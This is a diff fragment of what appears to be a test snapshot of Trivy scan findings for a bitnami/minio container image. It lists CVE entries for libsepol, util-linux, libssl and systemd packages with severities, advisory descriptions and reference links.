"https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", }, ], - "severity": "HIGH", + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36085", + "installedVersion": "3.1-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36085", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "https://linux.oracle.com/cve/CVE-2021-36085.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36085", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "libsepol: use-after-free in __cil_verify_classperms()", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-36085", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", + }, + { + "type": "URL", + "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + }, + { + "type": "URL", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36086", + "installedVersion": "3.1-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36086", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "https://linux.oracle.com/cve/CVE-2021-36086.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36086", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "use-after-free in cil_reset_classpermission()", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-36086", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", + }, + { + "type": "URL", + "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + }, + { + "type": "URL", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36087", + "installedVersion": "3.1-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36087", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "https://linux.oracle.com/cve/CVE-2021-36087.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36087", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-36087", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", + }, + { + "type": "URL", + "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + }, + { + "type": "URL", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libsmartcols1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + }, + { + "type": "URL", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + }, + { + "type": "URL", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + }, + ], + "severity": "LOW", }, { "attributes": { @@ -66403,7 +67193,7 @@ commonly used by applications.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-4450", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", "https://access.redhat.com/security/cve/CVE-2022-4450", @@ -66656,7 +67446,7 @@ commonly used by applications.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0215", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", "https://access.redhat.com/security/cve/CVE-2023-0215", @@ -66712,7 +67502,8 @@ commonly used by applications.", ], }, "category": "Vulnerability", - "description": "The public API function BIO_new_NDEF is a helper function used for streaming + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by end user applications. @@ -66743,7 +67534,8 @@ The OpenSSL cms and smime command line applications are similarly affected. -", +" +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "use-after-free following BIO_new_NDEF", @@ -66965,7 +67757,7 @@ The OpenSSL cms and smime command line applications are similarly affected. "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0286", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", "https://access.redhat.com/security/cve/CVE-2023-0286", @@ -67253,7 +68045,7 @@ The OpenSSL cms and smime command line applications are similarly affected. "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0464", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/security/cve/CVE-2023-0464", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", @@ -67261,6 +68053,8 @@ The OpenSSL cms and smime command line applications are similarly affected. "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://linux.oracle.com/cve/CVE-2023-0464.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", "https://ubuntu.com/security/notices/USN-6039-1", @@ -67270,7 +68064,8 @@ The OpenSSL cms and smime command line applications are similarly affected. ], }, "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions + "description": +"A security vulnerability has been identified in all supported versions of OpenSSL related to the verification of X.509 certificate chains that include policy constraints. Attackers may be able to exploit this @@ -67280,7 +68075,8 @@ exponential use of computational resources, leading to a denial-of-service Policy processing is disabled by default but can be enabled by passing the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", +\`X509_VERIFY_PARAM_set1_policies()' function." +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", @@ -67313,6 +68109,14 @@ the \`-policy' argument to the command line utilities or by calling the "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -67346,7 +68150,7 @@ the \`-policy' argument to the command line utilities or by calling the "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-2650", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "http://www.openwall.com/lists/oss-security/2023/05/30/1", "https://access.redhat.com/security/cve/CVE-2023-2650", @@ -67355,17 +68159,21 @@ the \`-policy' argument to the command line utilities or by calling the "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://linux.oracle.com/cve/CVE-2023-2650.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", "https://ubuntu.com/security/notices/USN-6119-1", + "https://ubuntu.com/security/notices/USN-6188-1", "https://www.cve.org/CVERecord?id=CVE-2023-2650", "https://www.debian.org/security/2023/dsa-5417", "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or data containing them may be very slow. Impact summary: Applications that use OBJ_obj2txt() directly, or use any of @@ -67413,7 +68221,8 @@ In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, such as X.509 certificates. This is assumed to not happen in such a way that it would cause a Denial of Service, so these versions are considered not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", +and the severity is therefore considered low." +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "Possible DoS translating ASN.1 object identifiers", @@ -67450,6 +68259,14 @@ and the severity is therefore considered low.", "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -67466,6 +68283,10 @@ and the severity is therefore considered low.", "type": "URL", "value": "https://ubuntu.com/security/notices/USN-6119-1", }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6188-1", + }, { "type": "URL", "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", @@ -67487,7 +68308,7 @@ and the severity is therefore considered low.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-2097", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2022:6224", "https://access.redhat.com/security/cve/CVE-2022-2097", @@ -67685,7 +68506,7 @@ and the severity is therefore considered low.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-4304", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", "https://access.redhat.com/security/cve/CVE-2022-4304", @@ -67928,7 +68749,7 @@ and the severity is therefore considered low.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0465", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/security/cve/CVE-2023-0465", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", @@ -67936,6 +68757,8 @@ and the severity is therefore considered low.", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://linux.oracle.com/cve/CVE-2023-0465.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", "https://security.netapp.com/advisory/ntap-20230414-0001/", @@ -67946,7 +68769,8 @@ and the severity is therefore considered low.", ], }, "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be + "description": +"Applications that use a non-default option when verifying certificates may be vulnerable to an attack from a malicious CA to circumvent certain checks. Invalid certificate policies in leaf certificates are silently ignored by @@ -67956,7 +68780,8 @@ in order to circumvent policy checking on the certificate altogether. Policy processing is disabled by default but can be enabled by passing the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", +\`X509_VERIFY_PARAM_set1_policies()' function." +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "Invalid certificate policies in leaf certificates are silently ignored", @@ -67989,6 +68814,14 @@ the \`-policy' argument to the command line utilities or by calling the "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2023-0465.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -68026,7 +68859,7 @@ the \`-policy' argument to the command line utilities or by calling the "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0466", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/security/cve/CVE-2023-0466", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", @@ -68034,6 +68867,8 @@ the \`-policy' argument to the command line utilities or by calling the "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://linux.oracle.com/cve/CVE-2023-0466.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", "https://security.netapp.com/advisory/ntap-20230414-0001/", @@ -68044,7 +68879,8 @@ the \`-policy' argument to the command line utilities or by calling the ], }, "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to implicitly enable the certificate policy check when doing certificate verification. However the implementation of the function does not enable the check which allows certificates with invalid or incorrect @@ -68060,7 +68896,8 @@ enable the policy check by calling X509_VERIFY_PARAM_set_flags() with the X509_V_FLAG_POLICY_CHECK flag argument. Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", +commonly used by applications." +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "Certificate policy check not enabled", @@ -68093,6 +68930,14 @@ commonly used by applications.", "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2023-0466.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -68130,7 +68975,7 @@ commonly used by applications.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2007-6755", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", @@ -68208,7 +69053,7 @@ commonly used by applications.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2010-0928", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", @@ -68272,501 +69117,405 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, + "fixedVersion": "247.3-7+deb11u2", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://secunia.com/advisories/27215", - 